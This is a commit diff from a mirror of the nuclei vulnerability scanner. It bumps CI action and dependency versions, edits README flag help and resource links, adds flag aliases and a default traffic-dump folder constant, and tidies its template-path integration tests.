mirror of https://github.com/daffainfo/nuclei.git
Merge branch 'dev' of github.com:projectdiscovery/nuclei into issue-1797-cleanup-resume-files
commit
2574a225b1
|
@ -13,7 +13,7 @@ jobs:
|
|||
os: [ubuntu-latest, windows-latest, macOS-latest]
|
||||
steps:
|
||||
- name: Set up Go
|
||||
uses: actions/setup-go@v2
|
||||
uses: actions/setup-go@v3
|
||||
with:
|
||||
go-version: 1.17
|
||||
|
||||
|
|
|
@ -10,7 +10,7 @@ jobs:
|
|||
index:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/setup-go@v2
|
||||
- uses: actions/setup-go@v3
|
||||
with:
|
||||
go-version: 1.17
|
||||
|
||||
|
|
|
@ -14,7 +14,7 @@ jobs:
|
|||
os: [ubuntu-latest, windows-latest, macOS-latest]
|
||||
steps:
|
||||
- name: Set up Go
|
||||
uses: actions/setup-go@v2
|
||||
uses: actions/setup-go@v3
|
||||
with:
|
||||
go-version: 1.17
|
||||
|
||||
|
|
|
@ -11,7 +11,7 @@ jobs:
|
|||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Set up Go
|
||||
uses: actions/setup-go@v2
|
||||
uses: actions/setup-go@v3
|
||||
with:
|
||||
go-version: 1.17
|
||||
- name: Checkout code
|
||||
|
|
|
@ -18,7 +18,7 @@ jobs:
|
|||
token: ${{ secrets.GITHUB_TOKEN }}
|
||||
|
||||
- name: "Set up Go"
|
||||
uses: actions/setup-go@v2
|
||||
uses: actions/setup-go@v3
|
||||
with:
|
||||
go-version: 1.17
|
||||
|
||||
|
|
|
@ -14,7 +14,7 @@ jobs:
|
|||
with:
|
||||
fetch-depth: 0
|
||||
|
||||
- uses: actions/setup-go@v2
|
||||
- uses: actions/setup-go@v3
|
||||
with:
|
||||
go-version: 1.17
|
||||
|
||||
|
|
|
@ -18,7 +18,7 @@ jobs:
|
|||
fetch-depth: 0 # Shallow clones should be disabled for a better relevancy of analysis
|
||||
|
||||
- name: "Set up Go"
|
||||
uses: actions/setup-go@v2
|
||||
uses: actions/setup-go@v3
|
||||
with:
|
||||
go-version: 1.17
|
||||
|
||||
|
|
|
@ -7,7 +7,7 @@ jobs:
|
|||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v3
|
||||
- uses: actions/setup-go@v2
|
||||
- uses: actions/setup-go@v3
|
||||
with:
|
||||
go-version: 1.17
|
||||
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
FROM golang:1.18.0-alpine as build-env
|
||||
RUN go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
|
||||
|
||||
FROM alpine:3.15.3
|
||||
FROM alpine:3.15.4
|
||||
RUN apk add --no-cache bind-tools ca-certificates chromium
|
||||
COPY --from=build-env /go/bin/nuclei /usr/local/bin/nuclei
|
||||
ENTRYPOINT ["nuclei"]
|
||||
|
|
38
README.md
38
README.md
|
@ -139,8 +139,8 @@ CONFIGURATIONS:
|
|||
-fr, -follow-redirects enable following redirects for http templates
|
||||
-mr, -max-redirects int max number of redirects to follow for http templates (default 10)
|
||||
-rc, -report-config string nuclei reporting module configuration file
|
||||
-H, -header string[] custom headers in header:value format
|
||||
-V, -var value custom vars in var=value format
|
||||
-H, -header string[] custom header/cookie to include in all http request in header:value format (cli, file)
|
||||
-V, -var value custom vars in key=value format
|
||||
-r, -resolvers string file containing resolver list for nuclei
|
||||
-sr, -system-resolvers use system DNS resolving as error fallback
|
||||
-passive enable passive HTTP response processing mode
|
||||
|
@ -184,20 +184,20 @@ HEADLESS:
|
|||
-sc, -system-chrome Use local installed chrome browser instead of nuclei installed
|
||||
|
||||
DEBUG:
|
||||
-debug show all requests and responses
|
||||
-debug-req show all sent requests
|
||||
-debug-resp show all received responses
|
||||
-debug display all requests and responses
|
||||
-dreq, -debug-req display all sent requests
|
||||
-dresp, -debug-resp display all received responses
|
||||
-sresp, -store-resp store all request/response passed through nuclei to output directory
|
||||
-srd, -store-resp-dir string store all request/response passed through nuclei to custom directory (default "output")
|
||||
-p, -proxy string[] list of http/socks5 proxy to use (comma separated or file input)
|
||||
-pi, -proxy-internal proxy all internal requests
|
||||
-tlog, -trace-log string file to write sent requests trace log
|
||||
-elog, -error-log string file to write sent requests error log
|
||||
-version show nuclei version
|
||||
-v, -verbose show verbose output
|
||||
-vv display templates loaded for scan
|
||||
-enable-pprof enable pprof debugging server
|
||||
-tv, -templates-version shows the version of the installed nuclei-templates
|
||||
-pi, -proxy-internal proxy all internal requests
|
||||
-tlog, -trace-log string file to write sent requests trace log
|
||||
-elog, -error-log string file to write sent requests error log
|
||||
-version show nuclei version
|
||||
-v, -verbose show verbose output
|
||||
-vv display templates loaded for scan
|
||||
-ep, -enable-pprof enable pprof debugging server
|
||||
-tv, -templates-version shows the version of the installed nuclei-templates
|
||||
|
||||
UPDATE:
|
||||
-update update nuclei engine to the latest released version
|
||||
|
@ -306,15 +306,17 @@ We have [a discussion thread around this](https://github.com/projectdiscovery/nu
|
|||
|
||||
### Resources
|
||||
|
||||
|
||||
- [Scanning Live Web Applications with Nuclei in CI/CD Pipeline](https://blog.escape.tech/devsecops-part-iii-scanning-live-web-applications/) by [@TristanKalos](https://twitter.com/TristanKalos)
|
||||
- [Finding bugs with Nuclei with PinkDraconian (Robbe Van Roey)](https://www.youtube.com/watch?v=ewP0xVPW-Pk) by **[@PinkDraconian](https://twitter.com/PinkDraconian)**
|
||||
- [Nuclei: Packing a Punch with Vulnerability Scanning](https://bishopfox.com/blog/nuclei-vulnerability-scan) by **Bishopfox**
|
||||
- [The WAF efficacy framework](https://www.fastly.com/blog/the-waf-efficacy-framework-measuring-the-effectiveness-of-your-waf) by **Fastly**
|
||||
- [Scanning Live Web Applications with Nuclei in CI/CD Pipeline](https://blog.escape.tech/devsecops-part-iii-scanning-live-web-applications/) by **[@TristanKalos](https://twitter.com/TristanKalos)**
|
||||
- [Community Powered Scanning with Nuclei](https://blog.projectdiscovery.io/community-powered-scanning-with-nuclei/)
|
||||
- [Nuclei Unleashed - Quickly write complex exploits](https://blog.projectdiscovery.io/nuclei-unleashed-quickly-write-complex-exploits/)
|
||||
- [Nuclei - Fuzz all the things](https://blog.projectdiscovery.io/nuclei-fuzz-all-the-things/)
|
||||
- [Nuclei + Interactsh Integration for Automating OOB Testing](https://blog.projectdiscovery.io/nuclei-interactsh-integration/)
|
||||
- [Weaponizes nuclei Workflows to Pwn All the Things](https://medium.com/@dwisiswant0/weaponizes-nuclei-workflows-to-pwn-all-the-things-cd01223feb77) by [@dwisiswant0](https://github.com/dwisiswant0)
|
||||
- [How to Scan Continuously with Nuclei?](https://medium.com/@dwisiswant0/how-to-scan-continuously-with-nuclei-fcb7e9d8b8b9) by [@dwisiswant0](https://github.com/dwisiswant0)
|
||||
- [Hack with Automation !!!](https://dhiyaneshgeek.github.io/web/security/2021/07/19/hack-with-automation/) by [@DhiyaneshGeek](https://github.com/DhiyaneshGeek)
|
||||
- [Weaponizes nuclei Workflows to Pwn All the Things](https://medium.com/@dwisiswant0/weaponizes-nuclei-workflows-to-pwn-all-the-things-cd01223feb77) by **[@dwisiswant0](https://github.com/dwisiswant0)**
|
||||
- [How to Scan Continuously with Nuclei?](https://medium.com/@dwisiswant0/how-to-scan-continuously-with-nuclei-fcb7e9d8b8b9) by **[@dwisiswant0](https://github.com/dwisiswant0)**
|
||||
- [Hack with Automation !!!](https://dhiyaneshgeek.github.io/web/security/2021/07/19/hack-with-automation/) by **[@DhiyaneshGeek](https://github.com/DhiyaneshGeek)**
|
||||
|
||||
### Credits
|
||||
|
||||
|
|
|
@ -2,6 +2,7 @@ package main
|
|||
|
||||
import (
|
||||
"fmt"
|
||||
"strings"
|
||||
|
||||
"github.com/projectdiscovery/nuclei/v2/pkg/testutils"
|
||||
"github.com/projectdiscovery/nuclei/v2/pkg/utils"
|
||||
|
@ -13,6 +14,8 @@ func getTemplatePath() string {
|
|||
}
|
||||
|
||||
var templatesPathTestCases = map[string]testutils.TestCase{
|
||||
//template folder path issue
|
||||
"http/get.yaml": &folderPathTemplateTest{},
|
||||
//cwd
|
||||
"./dns/cname-fingerprint.yaml": &cwdTemplateTest{},
|
||||
//relative path
|
||||
|
@ -25,15 +28,10 @@ type cwdTemplateTest struct{}
|
|||
|
||||
// Execute executes a test case and returns an error if occurred
|
||||
func (h *cwdTemplateTest) Execute(filePath string) error {
|
||||
var routerErr error
|
||||
|
||||
results, err := testutils.RunNucleiTemplateAndGetResults(filePath, "8x8exch02.8x8.com", debug)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
if routerErr != nil {
|
||||
return routerErr
|
||||
}
|
||||
return expectResultsCount(results, 1)
|
||||
}
|
||||
|
||||
|
@ -41,15 +39,10 @@ type relativePathTemplateTest struct{}
|
|||
|
||||
// Execute executes a test case and returns an error if occurred
|
||||
func (h *relativePathTemplateTest) Execute(filePath string) error {
|
||||
var routerErr error
|
||||
|
||||
results, err := testutils.RunNucleiTemplateAndGetResults(filePath, "8x8exch02.8x8.com", debug)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
if routerErr != nil {
|
||||
return routerErr
|
||||
}
|
||||
return expectResultsCount(results, 1)
|
||||
}
|
||||
|
||||
|
@ -57,14 +50,23 @@ type absolutePathTemplateTest struct{}
|
|||
|
||||
// Execute executes a test case and returns an error if occurred
|
||||
func (h *absolutePathTemplateTest) Execute(filePath string) error {
|
||||
var routerErr error
|
||||
|
||||
results, err := testutils.RunNucleiTemplateAndGetResults(filePath, "8x8exch02.8x8.com", debug)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
if routerErr != nil {
|
||||
return routerErr
|
||||
}
|
||||
return expectResultsCount(results, 1)
|
||||
}
|
||||
|
||||
type folderPathTemplateTest struct{}
|
||||
|
||||
// Execute executes a test case and returns an error if occurred
|
||||
func (h *folderPathTemplateTest) Execute(filePath string) error {
|
||||
results, err := testutils.RunNucleiBinaryAndGetCombinedOutput(debug, []string{"-t", filePath, "-target", "http://example.com"})
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
if strings.Contains(results, "installing") {
|
||||
return fmt.Errorf("couldn't find template path,re-installing")
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
|
|
@ -192,7 +192,7 @@ on extensive configurability, massive extensibility and ease of use.`)
|
|||
flagSet.BoolVarP(&options.DebugRequests, "debug-req", "dreq", false, "show all sent requests"),
|
||||
flagSet.BoolVarP(&options.DebugResponse, "debug-resp", "dresp", false, "show all received responses"),
|
||||
flagSet.BoolVarP(&options.StoreResponse, "store-resp", "sresp", false, "store all request/response passed through nuclei to output directory"),
|
||||
flagSet.StringVarP(&options.StoreResponseDir, "store-resp-dir", "srd", "output", "store all request/response passed through nuclei to custom directory"),
|
||||
flagSet.StringVarP(&options.StoreResponseDir, "store-resp-dir", "srd", runner.DefaultDumpTrafficOutputFolder, "store all request/response passed through nuclei to custom directory"),
|
||||
flagSet.NormalizedOriginalStringSliceVarP(&options.Proxy, "proxy", "p", []string{}, "list of http/socks5 proxy to use (comma separated or file input)"),
|
||||
flagSet.BoolVarP(&options.ProxyInternal, "proxy-internal", "pi", false, "proxy all internal requests"),
|
||||
flagSet.StringVarP(&options.TraceLogFile, "trace-log", "tlog", "", "file to write sent requests trace log"),
|
||||
|
@ -200,7 +200,7 @@ on extensive configurability, massive extensibility and ease of use.`)
|
|||
flagSet.BoolVar(&options.Version, "version", false, "show nuclei version"),
|
||||
flagSet.BoolVarP(&options.Verbose, "verbose", "v", false, "show verbose output"),
|
||||
flagSet.BoolVar(&options.VerboseVerbose, "vv", false, "display templates loaded for scan"),
|
||||
flagSet.BoolVar(&options.EnablePprof, "enable-pprof", false, "enable pprof debugging server"),
|
||||
flagSet.BoolVarP(&options.EnablePprof, "enable-pprof", "ep", false, "enable pprof debugging server"),
|
||||
flagSet.BoolVarP(&options.TemplatesVersion, "templates-version", "tv", false, "shows the version of the installed nuclei-templates"),
|
||||
)
|
||||
|
||||
|
|
15
v2/go.mod
15
v2/go.mod
|
@ -12,7 +12,7 @@ require (
|
|||
github.com/bluele/gcache v0.0.2
|
||||
github.com/corpix/uarand v0.1.1
|
||||
github.com/go-playground/validator/v10 v10.10.1
|
||||
github.com/go-rod/rod v0.104.4
|
||||
github.com/go-rod/rod v0.105.1
|
||||
github.com/gobwas/ws v1.1.0
|
||||
github.com/google/go-github v17.0.0+incompatible
|
||||
github.com/itchyny/gojq v0.12.7
|
||||
|
@ -38,7 +38,7 @@ require (
|
|||
github.com/projectdiscovery/rawhttp v0.0.8-0.20220321180300-366b511e8bfd
|
||||
github.com/projectdiscovery/retryabledns v1.0.13-0.20211109182249-43d38df59660
|
||||
github.com/projectdiscovery/retryablehttp-go v1.0.2
|
||||
github.com/projectdiscovery/stringsutil v0.0.0-20220208075244-7c05502ca8e9
|
||||
github.com/projectdiscovery/stringsutil v0.0.0-20220404001522-0d00e0703d0d
|
||||
github.com/projectdiscovery/yamldoc-go v1.0.3-0.20211126104922-00d2c6bb43b6
|
||||
github.com/remeh/sizedwaitgroup v1.0.0
|
||||
github.com/rs/xid v1.4.0
|
||||
|
@ -50,8 +50,8 @@ require (
|
|||
github.com/tj/go-update v2.2.5-0.20200519121640-62b4b798fd68+incompatible
|
||||
github.com/valyala/fasttemplate v1.2.1
|
||||
github.com/weppos/publicsuffix-go v0.15.1-0.20210928183822-5ee35905bd95
|
||||
github.com/xanzy/go-gitlab v0.61.0
|
||||
github.com/ysmood/gson v0.7.0 // indirect
|
||||
github.com/xanzy/go-gitlab v0.62.0
|
||||
github.com/ysmood/gson v0.7.1 // indirect
|
||||
github.com/ysmood/leakless v0.7.0 // indirect
|
||||
go.uber.org/atomic v1.9.0
|
||||
go.uber.org/multierr v1.8.0
|
||||
|
@ -63,7 +63,7 @@ require (
|
|||
moul.io/http2curl v1.0.0
|
||||
)
|
||||
|
||||
require github.com/aws/aws-sdk-go v1.43.32
|
||||
require github.com/aws/aws-sdk-go v1.43.36
|
||||
|
||||
require github.com/projectdiscovery/folderutil v0.0.0-20211206150108-b4e7ea80f36e
|
||||
|
||||
|
@ -71,12 +71,13 @@ require (
|
|||
github.com/asaskevich/govalidator v0.0.0-20210307081110-f21760c49a8d
|
||||
github.com/docker/go-units v0.4.0
|
||||
github.com/h2non/filetype v1.1.3
|
||||
github.com/hashicorp/go-version v1.4.0
|
||||
github.com/mholt/archiver v3.1.1+incompatible
|
||||
github.com/openrdap/rdap v0.9.1-0.20191017185644-af93e7ef17b7
|
||||
github.com/projectdiscovery/iputil v0.0.0-20210804143329-3a30fcde43f3
|
||||
github.com/projectdiscovery/nvd v1.0.9-0.20220314070650-d4a214c1f87d
|
||||
github.com/projectdiscovery/sliceutil v0.0.0-20220225084130-8392ac12fa6d
|
||||
github.com/projectdiscovery/wappalyzergo v0.0.35
|
||||
github.com/projectdiscovery/wappalyzergo v0.0.36
|
||||
github.com/stretchr/testify v1.7.1
|
||||
github.com/zmap/zcrypto v0.0.0-20211005224000-2d0ffdec8a9b
|
||||
)
|
||||
|
@ -149,7 +150,7 @@ require (
|
|||
github.com/valyala/bytebufferpool v1.0.0 // indirect
|
||||
github.com/xi2/xz v0.0.0-20171230120015-48954b6210f8 // indirect
|
||||
github.com/yl2chen/cidranger v1.0.2 // indirect
|
||||
github.com/ysmood/goob v0.3.1 // indirect
|
||||
github.com/ysmood/goob v0.4.0 // indirect
|
||||
github.com/yusufpapurcu/wmi v1.2.2 // indirect
|
||||
github.com/zclconf/go-cty v1.10.0 // indirect
|
||||
github.com/zmap/rc2 v0.0.0-20131011165748-24b9757f5521 // indirect
|
||||
|
|
37
v2/go.sum
37
v2/go.sum
|
@ -84,8 +84,8 @@ github.com/armon/consul-api v0.0.0-20180202201655-eb2c6b5be1b6/go.mod h1:grANhF5
|
|||
github.com/asaskevich/govalidator v0.0.0-20210307081110-f21760c49a8d h1:Byv0BzEl3/e6D5CLfI0j/7hiIEtvGVFPCZ7Ei2oq8iQ=
|
||||
github.com/asaskevich/govalidator v0.0.0-20210307081110-f21760c49a8d/go.mod h1:WaHUgvxTVq04UNunO+XhnAqY/wQc+bxr74GqbsZ/Jqw=
|
||||
github.com/aws/aws-sdk-go v1.20.6/go.mod h1:KmX6BPdI08NWTb3/sm4ZGu5ShLoqVDhKgpiN924inxo=
|
||||
github.com/aws/aws-sdk-go v1.43.32 h1:b2NQnfWfImfo7yzXq6gzXEC+6s5v1t2RU3G9o+VirYo=
|
||||
github.com/aws/aws-sdk-go v1.43.32/go.mod h1:y4AeaBuwd2Lk+GepC1E9v0qOiTws0MIWAX4oIKwKHZo=
|
||||
github.com/aws/aws-sdk-go v1.43.36 h1:8a+pYKNT7wSxUy3fi5dSqKQdfmit7SYGg5fv4zf+WuA=
|
||||
github.com/aws/aws-sdk-go v1.43.36/go.mod h1:y4AeaBuwd2Lk+GepC1E9v0qOiTws0MIWAX4oIKwKHZo=
|
||||
github.com/aybabtme/rgbterm v0.0.0-20170906152045-cc83f3b3ce59/go.mod h1:q/89r3U2H7sSsE2t6Kca0lfwTK8JdoNGS/yzM/4iH5I=
|
||||
github.com/benbjohnson/clock v1.1.0 h1:Q92kusRqC1XV2MjkWETPvjJVqKetz1OzxZB7mHJLju8=
|
||||
github.com/benbjohnson/clock v1.1.0/go.mod h1:J11/hYXuz8f4ySSvYwY0FKfm+ezbsZBKZxNJlLklBHA=
|
||||
|
@ -171,8 +171,8 @@ github.com/go-playground/validator/v10 v10.10.1 h1:uA0+amWMiglNZKZ9FJRKUAe9U3RX9
|
|||
github.com/go-playground/validator/v10 v10.10.1/go.mod h1:i+3WkQ1FvaUjjxh1kSvIA4dMGDBiPU55YFDl0WbKdWU=
|
||||
github.com/go-redis/redis v6.15.5+incompatible/go.mod h1:NAIEuMOZ/fxfXJIrKDQDz8wamY7mA7PouImQ2Jvg6kA=
|
||||
github.com/go-rod/rod v0.91.1/go.mod h1:/W4lcZiCALPD603MnJGIvhtywP3R6yRB9EDfFfsHiiI=
|
||||
github.com/go-rod/rod v0.104.4 h1:sQR35AFo9ceR7ksh+Ld81bQzIbrXlQH/IO46iCWqxts=
|
||||
github.com/go-rod/rod v0.104.4/go.mod h1:trmrxxg+qUodIIQiYeyJbW5ZMo0FSajmdEGw2tHzlM4=
|
||||
github.com/go-rod/rod v0.105.1 h1:r0bNmO9siOe13lG6Vbkaak11u48rYmWGl/Hk4MJdOiE=
|
||||
github.com/go-rod/rod v0.105.1/go.mod h1:Wrnn6HokFHskwaIVke3ML1y/NBVp7XPIeB8eDzR9vuw=
|
||||
github.com/goburrow/cache v0.1.4 h1:As4KzO3hgmzPlnaMniZU9+VmoNYseUhuELbxy9mRBfw=
|
||||
github.com/goburrow/cache v0.1.4/go.mod h1:cDFesZDnIlrHoNlMYqqMpCRawuXulgx+y7mXU8HZ+/c=
|
||||
github.com/gobwas/httphead v0.1.0 h1:exrUm0f4YX0L7EBwZHuCF4GDp8aJfVeBrlLQrs6NqWU=
|
||||
|
@ -272,6 +272,8 @@ github.com/hashicorp/go-hclog v0.9.2/go.mod h1:5CU+agLiy3J7N7QjHK5d05KxGsuXiQLrj
|
|||
github.com/hashicorp/go-retryablehttp v0.6.8 h1:92lWxgpa+fF3FozM4B3UZtHZMJX8T5XT+TFdCxsPyWs=
|
||||
github.com/hashicorp/go-retryablehttp v0.6.8/go.mod h1:vAew36LZh98gCBJNLH42IQ1ER/9wtLZZ8meHqQvEYWY=
|
||||
github.com/hashicorp/go-version v1.3.0/go.mod h1:fltr4n8CU8Ke44wwGCBoEymUuxUHl09ZGVZPK5anwXA=
|
||||
github.com/hashicorp/go-version v1.4.0 h1:aAQzgqIrRKRa7w75CKpbBxYsmUoPjzVm1W59ca1L0J4=
|
||||
github.com/hashicorp/go-version v1.4.0/go.mod h1:fltr4n8CU8Ke44wwGCBoEymUuxUHl09ZGVZPK5anwXA=
|
||||
github.com/hashicorp/golang-lru v0.5.0/go.mod h1:/m3WP610KZHVQ1SGc6re/UDhFvYD7pJ4Ao+sR/qLZy8=
|
||||
github.com/hashicorp/golang-lru v0.5.1/go.mod h1:/m3WP610KZHVQ1SGc6re/UDhFvYD7pJ4Ao+sR/qLZy8=
|
||||
github.com/hashicorp/hcl v1.0.0/go.mod h1:E5yfLk+7swimpb2L/Alb/PJmXilQ/rhwaUYs4T20WEQ=
|
||||
|
@ -486,10 +488,11 @@ github.com/projectdiscovery/sliceutil v0.0.0-20220225084130-8392ac12fa6d/go.mod
|
|||
github.com/projectdiscovery/stringsutil v0.0.0-20210804142656-fd3c28dbaafe/go.mod h1:oTRc18WBv9t6BpaN9XBY+QmG28PUpsyDzRht56Qf49I=
|
||||
github.com/projectdiscovery/stringsutil v0.0.0-20210823090203-2f5f137e8e1d/go.mod h1:oTRc18WBv9t6BpaN9XBY+QmG28PUpsyDzRht56Qf49I=
|
||||
github.com/projectdiscovery/stringsutil v0.0.0-20210830151154-f567170afdd9/go.mod h1:oTRc18WBv9t6BpaN9XBY+QmG28PUpsyDzRht56Qf49I=
|
||||
github.com/projectdiscovery/stringsutil v0.0.0-20220208075244-7c05502ca8e9 h1:4fvUw6b4sS4GoWbHr60mJo3dI//4mGt3BuLx8Sz9aNw=
|
||||
github.com/projectdiscovery/stringsutil v0.0.0-20220208075244-7c05502ca8e9/go.mod h1:oTRc18WBv9t6BpaN9XBY+QmG28PUpsyDzRht56Qf49I=
|
||||
github.com/projectdiscovery/wappalyzergo v0.0.35 h1:UDjCmOygrY0Q25ZH4jz5pEw67wPxO6ilHYJQoxgdfu4=
|
||||
github.com/projectdiscovery/wappalyzergo v0.0.35/go.mod h1:vS+npIOANv7eKsEtODsyRQt2n1v8VofCwj2gjmq72EM=
|
||||
github.com/projectdiscovery/stringsutil v0.0.0-20220404001522-0d00e0703d0d h1:QYq+NO3fGJyQNvvuciJDUb5LvTZLjRPP5hl7yk/G96A=
|
||||
github.com/projectdiscovery/stringsutil v0.0.0-20220404001522-0d00e0703d0d/go.mod h1:oTRc18WBv9t6BpaN9XBY+QmG28PUpsyDzRht56Qf49I=
|
||||
github.com/projectdiscovery/wappalyzergo v0.0.36 h1:8wz4ZvOP4FHMOMn7r4BSDPmQGFAbJk6gNx9w3elsv3A=
|
||||
github.com/projectdiscovery/wappalyzergo v0.0.36/go.mod h1:vS+npIOANv7eKsEtODsyRQt2n1v8VofCwj2gjmq72EM=
|
||||
github.com/projectdiscovery/yamldoc-go v1.0.2/go.mod h1:7uSxfMXaBmzvw8m5EhOEjB6nhz0rK/H9sUjq1ciZu24=
|
||||
github.com/projectdiscovery/yamldoc-go v1.0.3-0.20211126104922-00d2c6bb43b6 h1:DvWRQpw7Ib2CRL3ogYm/BWM+X0UGPfz1n9Ix9YKgFM8=
|
||||
github.com/projectdiscovery/yamldoc-go v1.0.3-0.20211126104922-00d2c6bb43b6/go.mod h1:8OfZj8p/axkUM/TJoS/O9LDjj/S8u17rxRbqluE9CU4=
|
||||
|
@ -582,28 +585,28 @@ github.com/weppos/publicsuffix-go v0.15.1-0.20210928183822-5ee35905bd95/go.mod h
|
|||
github.com/wsxiaoys/terminal v0.0.0-20160513160801-0940f3fc43a0 h1:3UeQBvD0TFrlVjOeLOBz+CPAI8dnbqNSVwUwRrkp7vQ=
|
||||
github.com/wsxiaoys/terminal v0.0.0-20160513160801-0940f3fc43a0/go.mod h1:IXCdmsXIht47RaVFLEdVnh1t+pgYtTAhQGj73kz+2DM=
|
||||
github.com/xanzy/go-gitlab v0.50.3/go.mod h1:Q+hQhV508bDPoBijv7YjK/Lvlb4PhVhJdKqXVQrUoAE=
|
||||
github.com/xanzy/go-gitlab v0.61.0 h1:sPeRduwe8/8z32nw/5ogQ8f5GP1X096azK4VEq4d5qI=
|
||||
github.com/xanzy/go-gitlab v0.61.0/go.mod h1:F0QEXwmqiBUxCgJm8fE9S+1veX4XC9Z4cfaAbqwk4YM=
|
||||
github.com/xanzy/go-gitlab v0.62.0 h1:D3WuIK1UJ7JPSiYI077PQaU5dcPEshpimCSP07Do1aQ=
|
||||
github.com/xanzy/go-gitlab v0.62.0/go.mod h1:F0QEXwmqiBUxCgJm8fE9S+1veX4XC9Z4cfaAbqwk4YM=
|
||||
github.com/xi2/xz v0.0.0-20171230120015-48954b6210f8 h1:nIPpBwaJSVYIxUFsDv3M8ofmx9yWTog9BfvIu0q41lo=
|
||||
github.com/xi2/xz v0.0.0-20171230120015-48954b6210f8/go.mod h1:HUYIGzjTL3rfEspMxjDjgmT5uz5wzYJKVo23qUhYTos=
|
||||
github.com/xordataexchange/crypt v0.0.3-0.20170626215501-b2862e3d0a77/go.mod h1:aYKd//L2LvnjZzWKhF00oedf4jCCReLcmhLdhm1A27Q=
|
||||
github.com/yl2chen/cidranger v1.0.2 h1:lbOWZVCG1tCRX4u24kuM1Tb4nHqWkDxwLdoS+SevawU=
|
||||
github.com/yl2chen/cidranger v1.0.2/go.mod h1:9U1yz7WPYDwf0vpNWFaeRh0bjwz5RVgRy/9UEQfHl0g=
|
||||
github.com/ysmood/goob v0.3.0/go.mod h1:S3lq113Y91y1UBf1wj1pFOxeahvfKkCk6mTWTWbDdWs=
|
||||
github.com/ysmood/goob v0.3.1 h1:qMp5364BGS1DLJVrAqUxTF6KOFt0YDot8GC70u/0jbI=
|
||||
github.com/ysmood/goob v0.3.1/go.mod h1:S3lq113Y91y1UBf1wj1pFOxeahvfKkCk6mTWTWbDdWs=
|
||||
github.com/ysmood/goob v0.4.0 h1:HsxXhyLBeGzWXnqVKtmT9qM7EuVs/XOgkX7T6r1o1AQ=
|
||||
github.com/ysmood/goob v0.4.0/go.mod h1:u6yx7ZhS4Exf2MwciFr6nIM8knHQIE22lFpWHnfql18=
|
||||
github.com/ysmood/got v0.9.3/go.mod h1:pE1l4LOwOBhQg6A/8IAatkGp7uZjnalzrZolnlhhMgY=
|
||||
github.com/ysmood/got v0.14.1/go.mod h1:pE1l4LOwOBhQg6A/8IAatkGp7uZjnalzrZolnlhhMgY=
|
||||
github.com/ysmood/got v0.19.1 h1:EuONavT9bfly3VunaA+Dt3lBMnQgUFlbUi8dWaz+ddw=
|
||||
github.com/ysmood/got v0.19.1/go.mod h1:pE1l4LOwOBhQg6A/8IAatkGp7uZjnalzrZolnlhhMgY=
|
||||
github.com/ysmood/got v0.23.2 h1:U2U0vyQ/gDaawkKJZK/hyza8UUXbWCurbmazK7AcAfY=
|
||||
github.com/ysmood/got v0.23.2/go.mod h1:pE1l4LOwOBhQg6A/8IAatkGp7uZjnalzrZolnlhhMgY=
|
||||
github.com/ysmood/gotrace v0.2.0/go.mod h1:TzhIG7nHDry5//eYZDYcTzuJLYQIkykJzCRIo4/dzQM=
|
||||
github.com/ysmood/gotrace v0.2.2/go.mod h1:TzhIG7nHDry5//eYZDYcTzuJLYQIkykJzCRIo4/dzQM=
|
||||
github.com/ysmood/gotrace v0.4.0 h1:NkiFGkr8AXxkEosLFudsvw5aGoBY5N7wFPOI4ZSCkb4=
|
||||
github.com/ysmood/gotrace v0.4.0/go.mod h1:TzhIG7nHDry5//eYZDYcTzuJLYQIkykJzCRIo4/dzQM=
|
||||
github.com/ysmood/gotrace v0.6.0 h1:SyI1d4jclswLhg7SWTL6os3L1WOKeNn/ZtzVQF8QmdY=
|
||||
github.com/ysmood/gotrace v0.6.0/go.mod h1:TzhIG7nHDry5//eYZDYcTzuJLYQIkykJzCRIo4/dzQM=
|
||||
github.com/ysmood/gson v0.6.3/go.mod h1:3Kzs5zDl21g5F/BlLTNcuAGAYLKt2lV5G8D1zF3RNmg=
|
||||
github.com/ysmood/gson v0.6.4/go.mod h1:3Kzs5zDl21g5F/BlLTNcuAGAYLKt2lV5G8D1zF3RNmg=
|
||||
github.com/ysmood/gson v0.7.0 h1:oQhY2FQtfy3+bgaNeqopd7NGAB6Me+UpG0n7oO4VDko=
|
||||
github.com/ysmood/gson v0.7.0/go.mod h1:3Kzs5zDl21g5F/BlLTNcuAGAYLKt2lV5G8D1zF3RNmg=
|
||||
github.com/ysmood/gson v0.7.1 h1:zKL2MTGtynxdBdlZjyGsvEOZ7dkxaY5TH6QhAbTgz0Q=
|
||||
github.com/ysmood/gson v0.7.1/go.mod h1:3Kzs5zDl21g5F/BlLTNcuAGAYLKt2lV5G8D1zF3RNmg=
|
||||
github.com/ysmood/leakless v0.6.12/go.mod h1:R8iAXPRaG97QJwqxs74RdwzcRHT1SWCGTNqY8q0JvMQ=
|
||||
github.com/ysmood/leakless v0.7.0 h1:XCGdaPExyoreoQd+H5qgxM3ReNbSPFsEXpSKwbXbwQw=
|
||||
github.com/ysmood/leakless v0.7.0/go.mod h1:R8iAXPRaG97QJwqxs74RdwzcRHT1SWCGTNqY8q0JvMQ=
|
||||
|
|
|
@ -0,0 +1,6 @@
|
|||
package runner
|
||||
|
||||
const (
|
||||
// Default directory used to save protocols traffic
|
||||
DefaultDumpTrafficOutputFolder = "output"
|
||||
)
|
|
@ -57,8 +57,8 @@ func ParseOptions(options *types.Options) {
|
|||
gologger.Info().Msgf("Current nuclei-templates version: %s (%s)\n", configuration.TemplateVersion, configuration.TemplatesDirectory)
|
||||
os.Exit(0)
|
||||
}
|
||||
if options.StoreResponseDir != "" && !options.StoreResponse {
|
||||
gologger.Debug().Msgf("Store response directory specified, enabling \"str\" flag automatically\n")
|
||||
if options.StoreResponseDir != DefaultDumpTrafficOutputFolder && !options.StoreResponse {
|
||||
gologger.Debug().Msgf("Store response directory specified, enabling \"store-resp\" flag automatically\n")
|
||||
options.StoreResponse = true
|
||||
}
|
||||
// Validate the options passed by the user and if any
|
||||
|
|
|
@ -96,7 +96,7 @@ func (r *Runner) updateTemplates() error { // TODO this method does more than ju
|
|||
ctx := context.Background()
|
||||
